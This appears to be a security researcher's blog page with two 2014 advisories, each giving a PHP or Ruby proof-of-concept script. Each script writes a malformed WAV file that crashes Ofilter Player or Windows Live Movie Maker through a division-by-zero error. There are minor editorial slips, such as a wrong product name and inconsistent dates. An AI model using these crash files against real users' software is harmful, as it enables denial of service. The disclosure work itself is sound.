Month: January 2014

1. Advisory Information

Title: Ofilter Player WAV File Handling Division-by-zero DoS Weakness
Advisory URL: https://osandamalith.com/2014/01/10/ofilter-player-wav-file-handling-division-by-zero-dos-weakness/
Date published: 2014-01-10
Vendors contacted: 008soft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A

3. Summary

Easy Karaoke Player is a software that is playing karaoke, recording karaoke songs to wav format files. This application is able to read all types of multimedia files with an integrated multimedia player that is both efficient and full-powered.

4. Vulnerability Description

Ofilter Player contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a division-by-zero error and a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

• 1.1

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

[code language=”php”]

<?php
/*
*Title: Ofilter Player 1.1 (.wav) Integer Division by Zero
*Version: 1.1
*Tested on: Windows XP SP2 en
*Vendor: http://www.008soft.com/
*Software Link: http://www.008soft.com/downloads_OfilterPlayer.exe
*E-Mail: OsandaJayathissa@gmail.com
*Bug Discovered by: Osanda Malith
*Twitter: @OsandaMalith
* /!\ Author is not responsible for any damage you cause
* This POC is for educational purposes only
*/
$poc=
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

file_put_contents("ofilterplayer.wav", $poc);
print <<< str
[+] Ofilter Player 1.1 Integer Division by Zero
[+] by Osanda Malith (@OsandaMalith)
[~] File Created "ofilterplayer.wav"
str;
?>

[/code]

8. Report Timeline

2013-09-19: The researcher notifies the vendor 008soft.
2013-09-23: The researcher attempts to contact the vendor
2013-10-05: The researcher attempts to contact the vendor
2014-01-10: Advisory and public disclosure

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124610/Ofilter-Player-1.1-Integer-Division-By-Zero.html
[2] http://www.exploit-db.com/exploits/30550

1. Advisory Information

Title: Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.com/2014/01/10/microsoft-windows-live-movie-maker-wav-file-handling-dos-weakness/
Date published: 2014-10-10
Vendors contacted: Microsoft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: 2013-4858

3. Summary

Microsoft Windows Live Movie maker is a inbuilt application in Windows 7 systems. It is used in simple scale video editing purposes.

4. Vulnerability Description

Microsoft Windows Live Movie Maker contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

• Version 2011 (Build 15.4.53508.1109)

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept

[code language=”ruby”]
#!/usr/bin/env ruby
#Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit
#Version: Version 2011 (Build 15.4.53508.1109)
#Tested on: Windows 7 Professional 32-bit SP1
#E-Mail: OsandaJayathissa@gmail.com
#Exploit-Author: Osanda Malith Jayathissa
#Video: https://www.youtube.com/watch?v=SBJYzSNdY6k
# /!\ Auhor is not responsible for any damage you cause
# Use this material for educational purposes only
#This is just a simple crash not an exploitable bug
#Twitter: @OsandaMalith
#Date: 25 Decemeber 2013
#CVE: 2013-4858
begin
dos =(
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

file = open("WindowsMovieMaker.wav","w")
file.write(dos)
file.close()

puts "[+] Exploit created >> WindowsMovieMaker.wav"
puts "[*] Open any image and Click add music and add our payload"
puts "[~] by Osanda Malith"
end
#EOF
[/code]

8. Report Timeline

2013-10-16: The researcher notifies the vendor Microsoft.
2013-20-16: Confirms that is only a crash and not a exploitable bug.
2014-01-10: Public disclosure.

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124596/Windows-Live-Movie-Maker-2011-Denial-Of-Service.html